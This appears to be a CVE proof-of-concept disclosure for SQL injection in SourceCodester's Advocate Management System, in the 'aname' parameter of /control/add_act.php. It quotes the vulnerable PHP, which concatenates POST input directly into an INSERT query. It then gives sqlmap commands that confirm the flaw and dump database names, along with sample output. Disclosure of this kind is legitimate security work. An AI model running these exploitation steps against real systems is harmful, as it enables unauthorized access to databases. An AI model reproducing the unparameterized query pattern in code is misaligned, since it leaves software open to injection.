Skip to main content

CVE-2024-6729

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Advocate Management System

Affected components: /control/add_act.php

Injection parameter: MULTIPART aname

 

POC

101

The add_acts.php file adds the use input directly into the SQL query, without any parameterizaztion.

image

$aname = $_POST['aname'];
:
: <SNIP>
:
$sql = "INSERT INTO legel_acts(act_name,status) VALUES ('$aname','1')";

Intercept request using Burpsuite Proxy.

102

Save the request to control.add_act.txt.

The vulnerability can be verified with the following command:

sqlmap -r control.add_act.txt --batch

51

Parameter: MULTIPART aname ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------8879615583215427378340903645
Content-Disposition: form-data; name="aname"

The databases can be dumped with the following command:

sqlmap -r control.add_act.txt --batch --dbs

154

[04:20:26] [INFO] fetching database names
[04:20:26] [INFO] resumed: 'information_schema'
[04:20:26] [INFO] resumed: 'kortex_lite'
available databases [2]:
[*] information_schema
[*] kortex_lite